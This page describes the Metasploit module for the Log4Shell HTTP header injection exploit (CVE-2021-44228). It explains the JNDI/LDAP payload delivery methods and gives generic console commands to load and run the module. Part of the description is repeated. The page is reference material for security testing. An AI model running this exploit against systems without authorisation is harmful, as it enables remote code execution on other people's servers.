module
Log4Shell HTTP Header Injection
| Disclosed | Created |
|---|---|
| 12/09/2021 | 01/17/2022 |
Disclosed
12/09/2021
Created
01/17/2022
Description
Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,
log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.
This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that
will trigger an LDAP connection to Metasploit and load a payload.
The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP
server in addition to the LDAP server that the target can connect to. The targeted application must have the
trusted code base option enabled for this technique to work.
The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to
run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target
application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.
log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.
This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that
will trigger an LDAP connection to Metasploit and load a payload.
The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP
server in addition to the LDAP server that the target can connect to. The targeted application must have the
trusted code base option enabled for this technique to work.
The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to
run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target
application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.
Authors
Michael Schierljuan vazquez sinn3r Spencer McIntyreRageLtMan
References
Module Options
To display the available options, load the module within the Metasploit console and run the commands ‘show options’ or ‘show advanced’:
msf > use exploit/multi/http/log4shell_header_injection
msf /(n) > show actions
...actions...
msf /(n) > set ACTION < action-name >
msf /(n) > show options
...show and set options...
msf /(n) > run
NEW
Explore Exposure Command
Confidently identify and prioritize exposures from endpoint to cloud with full attack surface visibility and threat-aware risk context.